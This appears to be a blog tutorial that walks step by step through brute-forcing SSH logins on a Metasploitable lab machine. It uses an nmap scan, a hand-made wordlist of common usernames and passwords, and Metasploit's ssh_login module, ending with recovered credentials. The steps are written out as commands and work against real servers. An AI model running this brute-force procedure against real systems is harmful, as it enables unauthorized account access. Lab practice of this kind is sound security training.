How to Bruteforce ssh login credentials using Metasploit
- Install Metasploitable- To install Metasploitable you can simply follow this article → https://ambhalerao12.medium.com/how-to-install-metasploitable-on-virtual-box-5e9220a2041a
- After installing Metasploitable go to it’s network settings in the Virtual Box and select Bridged Adapter and then click OK
3. Load Metasploitable and Kali Linux
4. Login in Metasploitable and use the ifconfig command to find out it’s local ip address. Here the local ip address is 192.168.1.105
5. In Kali Linux open the terminal and perform a nmap scan on the target.
nmap <target ip address>
6. Here you can see the ssh port i.e port 22 open
7.Before we begin the attack we need to create a small text file with possible usernames and passwords. You can also you the rockyou.txt text file which is already present in Kali Linux.
To create the file type the command -
cat>file.txt
admin
root
msfadmin
toor
administrator
admin123
root123
test
8.Load Metasploit by typing ‘msfconsole’ in the Kali Linux terminal
9.In the Metasploitable console give the command-
use auxiliary/scanner/ssh/ssh_login
10. Now in the Metasploitable console give the command-
show options11. The ‘show options’ command will give you the list of parameters that you have to enter in order to perform the attack
12. Now we have to set all these parameters, to do this simply give the commands listed below one by one.
set blank_passwords trueset stop_on_success trueset verbose trueset user_file file.txtset pass_file file.txtset rhosts 192.168.1.105
Here rhosts is the targets ip address
13. Give the ‘run’ or ‘exploit’ command, the tool will do the rest
14. Here we can see that we have got a match for a username and password. →msfadmin:msfadmin
Let’s try that-
We can see that we have successfully logged into the target machine by bruteforcing the login credentials.
Check out how to do this same bruteforce attack using NMAP-
→How to bruteforce ssh login credentials using NMAP | by Akshay Bhalerao | Sep, 2021 | Medium